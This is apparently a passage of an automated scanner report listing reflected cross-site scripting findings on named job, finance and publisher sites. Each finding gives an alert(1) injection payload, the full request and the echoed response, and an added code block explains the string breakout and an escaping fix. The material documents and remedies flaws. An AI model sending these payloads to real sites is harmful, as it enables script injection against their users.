Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:04 GMT
Content-Length: 61534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDd412c'-alert(1)-'1cf6036fd5b&JobId=131750&JobName=Acct-Exec-Small-Business-Sales';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='
...[SNIP]...

1.108. http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131750/Acct-Exec-Small-Business-Sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6112'-alert(1)-'19d36ec284c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f6112'-alert(1)-'19d36ec284c=1 HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:14 GMT
Content-Length: 63142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f6112'-alert(1)-'19d36ec284c=1&JobId=131750&JobName=Acct-Exec-Small-Business-Sales';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!
...[SNIP]...

1.109. http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales [reflink parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131750/Acct-Exec-Small-Business-Sales

Issue detail

The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 156da'-alert(1)-'1fcb5beb4d8 was submitted in the reflink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia156da'-alert(1)-'1fcb5beb4d8&cobrand=ATD HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:33:24 GMT
Content-Length: 63279


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia156da'-alert(1)-'1fcb5beb4d8&cobrand=ATD&JobId=131750&JobName=Acct-Exec-Small-Business-Sales';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(O
...[SNIP]...

1.110. http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC [cobrand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC

Issue detail

The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec4b'-alert(1)-'adbf5650abc was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD7ec4b'-alert(1)-'adbf5650abc HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.2.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:46 GMT
Content-Length: 66069


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD7ec4b'-alert(1)-'adbf5650abc&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(O
...[SNIP]...

1.111. http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b923c'-alert(1)-'c322821b1b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&b923c'-alert(1)-'c322821b1b3=1 HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.2.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:41 GMT
Content-Length: 67699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&b923c'-alert(1)-'c322821b1b3=1&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof
...[SNIP]...

1.112. http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC [reflink parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC

Issue detail

The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95428'-alert(1)-'c228a9bf103 was submitted in the reflink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia95428'-alert(1)-'c228a9bf103&cobrand=ATD HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.2.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:33:40 GMT
Content-Length: 67830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia95428'-alert(1)-'c228a9bf103&cobrand=ATD&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
i
...[SNIP]...
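Findings 1.108 to 1.112 above all reduce to one mechanism: the attacker's quote closes the JavaScript string literal and everything after it is parsed as code, which is why the bare probe '-alert(1)-' fires without any HTML tag. The following is an added example, not code from the report or from the sites it lists, that reproduces the breakout with the scanner's own probes and shows the context-specific encoding that neutralises it; it also covers the double-quoted variant reported against services.harpercollins.com later in this section. The URL prefix http://example.invalid/ and the function names are placeholders.

```javascript
// Added example, not code from the report or from the sites it lists.
// It shows why a value reflected into a quoted JavaScript string literal
// is exploitable and one output encoding that stops it. The unsafe
// renderers imitate the OB_permalink and MarketingId lines seen in the
// responses; the URL prefix is a placeholder.

// The scanner's probes, copied from findings 1.108 and 1.114.
const PROBE_SINGLE = "f6112'-alert(1)-'19d36ec284c";
const PROBE_DOUBLE = '3baae";alert(1)//18e3cd7c00e';

// Vulnerable: the parameter value is concatenated into the literal as-is.
function renderUnsafeSingle(cobrand) {
  return "var OB_permalink = 'http://example.invalid/Jobs/1?cobrand=" +
    cobrand + "';";
}
function renderUnsafeDouble(mid) {
  return 'var MarketingId = "' + mid + '";';
}

// Encoder for the JavaScript-string context: every UTF-16 code unit outside
// [A-Za-z0-9] becomes a \uXXXX escape, so quotes, backslashes, all line
// terminators (including U+2028/U+2029) and "</script>" cannot appear
// literally in the emitted source, whichever quote style encloses it.
function escapeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened: same templates, encoded value.
function renderSafeSingle(cobrand) {
  return "var OB_permalink = 'http://example.invalid/Jobs/1?cobrand=" +
    escapeForJsString(cobrand) + "';";
}
function renderSafeDouble(mid) {
  return 'var MarketingId = "' + escapeForJsString(mid) + '";';
}

// Run a rendered script with alert() replaced by a counter. Returns how many
// times alert fired and the value the variable ended up holding: the safe
// version must not fire and must round-trip the original value exactly.
function execute(script, varName) {
  let fired = 0;
  const alertStub = () => { fired += 1; };
  const fn = new Function('alert', script + '\nreturn ' + varName + ';');
  const value = fn(alertStub);
  return { fired, value };
}

// Stand-alone demonstration.
console.log('unsafe single:', execute(renderUnsafeSingle(PROBE_SINGLE), 'OB_permalink'));
console.log('safe   single:', execute(renderSafeSingle(PROBE_SINGLE), 'OB_permalink'));
console.log('unsafe double:', execute(renderUnsafeDouble(PROBE_DOUBLE), 'MarketingId'));
console.log('safe   double:', execute(renderSafeDouble(PROBE_DOUBLE), 'MarketingId'));
```

Run it with node. In the unsafe single-quoted case the expression 'prefix...f6112' - alert(1) - '19d36ec284c' evaluates alert as a side effect and leaves NaN in OB_permalink; in the double-quoted case the // in the probe swallows the rest of the line. The encoded versions keep the probe inert and the decoded variable equals the submitted value, which is the property a context-aware encoder must have.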

1.113. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sbklivequoteserverdl.smartmoney.com
Path:   /livequote/tokenJSON

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 3f0cf<a>e90c4a69c92 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. Two points qualify the finding. The response is served as application/x-javascript rather than text/html, so a browser that navigates to this URL will not parse the injected tag as markup. The actual exposure is that the jsoncallback value is reflected unvalidated as the leading bytes of a script response, which is the pattern abused by attacks on JSONP endpoints. Restrict the callback to a strict identifier pattern, prefix the body with /**/, send X-Content-Type-Options: nosniff, and then manually examine the application's behaviour for any remaining input validation or other obstacles that may be in place.

Request

GET /livequote/tokenJSON?list=NLS:$I.DJI,$I.COMPX,$INX&jsoncallback=jQuery151023154082498513162_13154165581683f0cf<a>e90c4a69c92&_=1315416558239 HTTP/1.1
Host: sbklivequoteserverdl.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=2f47fc3e-f5cc-45d9-a394-82d100bc56a1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 12:28:56 GMT
Content-Length: 163

jQuery151023154082498513162_13154165581683f0cf<a>e90c4a69c92({"token" : "D0647A776FCC8CCED063917E5C8DD51A", "data" : "11139.3|-100.96,2473.83|-6.5,1165.24|-8.73"})

1.114. http://services.harpercollins.com/widgets/subscription/default.aspx [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/default.aspx

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3baae"%3balert(1)//18e3cd7c00e was submitted in the pt parameter. This input was echoed as 3baae";alert(1)//18e3cd7c00e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/default.aspx?sid=2&pt=nl3baae"%3balert(1)//18e3cd7c00e&pv=N42&dn=default HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:24:41 GMT
Content-Length: 1591


var theURL = document.URL;
var hasQueryString = theURL.indexOf("?");
var qsRefresh = "";

if (hasQueryString != -1) {
   var theQS = theURL.substring(hasQueryString+1, theURL.length);
   var arg
...[SNIP]...
<link rel=\"stylesheet\" type=\"text\/css\" href=\"http://services.harpercollins.com\/widgets\/subscription\/css\/style.aspx?sid=2&pt=nl3baae";alert(1)//18e3cd7c00e&pv=n42&dn=default" + qsRefresh + "\" \/>
...[SNIP]...

1.115. http://services.harpercollins.com/widgets/subscription/default.aspx [pv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/default.aspx

Issue detail

The value of the pv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6040d"%3balert(1)//c2ca12fcdf3 was submitted in the pv parameter. This input was echoed as 6040d";alert(1)//c2ca12fcdf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/default.aspx?sid=2&pt=nl&pv=N426040d"%3balert(1)//c2ca12fcdf3&dn=default HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:24:43 GMT
Content-Length: 1591


var theURL = document.URL;
var hasQueryString = theURL.indexOf("?");
var qsRefresh = "";

if (hasQueryString != -1) {
   var theQS = theURL.substring(hasQueryString+1, theURL.length);
   var arg
...[SNIP]...
<link rel=\"stylesheet\" type=\"text\/css\" href=\"http://services.harpercollins.com\/widgets\/subscription\/css\/style.aspx?sid=2&pt=nl&pv=n426040d";alert(1)//c2ca12fcdf3&dn=default" + qsRefresh + "\" \/>
...[SNIP]...

1.116. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f773"%3balert(1)//ee38c3c5290 was submitted in the mid parameter. This input was echoed as 2f773";alert(1)//ee38c3c5290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=nl&pv=n42&dn=default&mid=2f773"%3balert(1)//ee38c3c5290&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; fsr.a=1315416306405; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:17 GMT
Content-Length: 30335


document.write("<font class=\"fontGlobal2nln42default\"><div id=\"divHCWidgetHead2nln42default\"></div>");
document.write("<div id=\"divHCWidgetBody2nln42default\" class=\"HCTextSty
...[SNIP]...
"nl");
var strProgramType2nln42default = GetProgramType2nln42default("nl");
var iCurrentState2nln42default = 0;
var iPrevState2nln42default = 0;
var MarketingId = "2f773";alert(1)//ee38c3c5290";

//Global object assignments
var divHCWidgetBody2nln42default = document.getElementById("divHCWidgetBody2nln42default");
var divHCMarketingCopy2nln42default = document.ge
...[SNIP]...

1.117. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 24aec%3balert(1)//c4608435b21 was submitted in the pt parameter. This input was echoed as 24aec;alert(1)//c4608435b21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. In this instance the value is not inside a string at all: it is spliced into identifiers such as WidgetId2nl...n42default, so no output encoding can contain it. The fix is to reject any pt value that is not a short alphanumeric token before it reaches the template.

Request

